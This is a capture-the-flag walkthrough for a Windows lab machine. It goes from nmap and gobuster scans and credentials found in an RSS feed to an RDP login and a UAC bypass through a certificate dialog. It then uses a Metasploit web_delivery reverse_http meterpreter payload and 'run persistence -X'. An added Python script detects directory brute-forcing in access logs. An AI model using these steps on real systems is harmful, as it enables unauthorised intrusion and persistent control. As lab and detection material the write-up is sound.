Difficulty: Easy (Windows)
-sV : Version scan (service/version detection)
-A : Aggressive scan
-p- : Scan all ports
-oN : Normal text output to a file
-Pn : Used when the host appears to be down; it tells Nmap to skip host discovery (the ping) and scan anyway.
And we have found the hidden directory /retro, let’s browse it.
Command: gobuster dir -u http://10.10.51.42 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,js -t 64
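As an added detection-side example (not part of the original walkthrough): a wordlist scan like the gobuster run above leaves a burst of 404 responses from one source in the web server's access log. The script below parses constructed Apache combined-log lines (IPs, paths and times are made up) and flags any source that produces a threshold number of 404s inside a sliding time window.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache "combined" log sample (made-up IPs, paths and times):
# one ordinary visitor and one source rapidly requesting guessed names with
# the php,txt,html,js extensions, the pattern a wordlist scan leaves behind.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:10:00:05 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:10:00:06 +0000] "GET /admin HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:10:00:06 +0000] "GET /admin.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:10:00:06 +0000] "GET /admin.txt HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:10:00:07 +0000] "GET /admin.html HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:10:00:07 +0000] "GET /admin.js HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.10.14.7 - - [01/Jan/2024:10:00:08 +0000] "GET /retro/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /favicon.ico HTTP/1.1" 404 196 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "path": m["path"], "status": int(m["status"]),
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")}

def detect_bruteforce(log_text, window_seconds=60, threshold=5):
    """Return {ip: max 404s seen in one window} for sources reaching threshold.
    Keyed on status codes, not User-Agent, since a scanner can send any UA."""
    misses = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            misses[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in misses.items():
        stamps.sort()
        start, best = 0, 0
        for end, t in enumerate(stamps):  # sliding window over sorted timestamps
            while (t - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

print(detect_bruteforce(SAMPLE_LOG))  # {'10.10.14.7': 5}
```

Tune window_seconds and threshold to the site's normal 404 rate; a single visitor with a bad bookmark should stay well under the threshold while a multi-threaded scan crosses it within seconds.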
And we found a potential username: Wade
Now we move to /author/wade
Click on the comments RSS feed and we find a potential password: XXXXXXX
# Microsoft Remote Desktop (MSRDP):
Now we can try to log into Remote Desktop using “Remmina”; if you don’t have it, install it with “apt-get install remmina”.
Enter the credentials found and the domain, and we are in!!!!!
And we found the 1st flag!!
If we continue browsing the machine over the remote session, we can see in the history interesting information about a CVE, which we could make use of.
Inside the machine we find a program that appears to be an executable.
But it seems to want a password. Click on “Show more details”.
So it’s asking for the Administrator password; let’s click on “Show information about the publisher’s certificate”.
Then click on “VeriSign Commercial Software Publishers CA”, after which Internet Explorer will open.
Click on “Settings”, then “File”, and click on “Save as”.
You will see an error; click on “OK”, then in the “File name” box enter C:\Windows\System32\*.* and save.
For more information visit: https://www.youtube.com/watch?v=3BQKpPNlTSo
Now search for: cmd
Type whoami :D
Now let’s go find root.txt. LET’S GOOO!
Now launch Metasploit and select ‘exploit/multi/script/web_delivery’.
Now show options and set everything; remember to use “set target 2” (PSH)
and “set payload windows/meterpreter/reverse_http”.
Now paste the generated payload into the CMD!
And the meterpreter session should open.
run persistence -X
We now have full control of the machine every time it starts up, ready to carry out further operations. I hope I have been useful to you.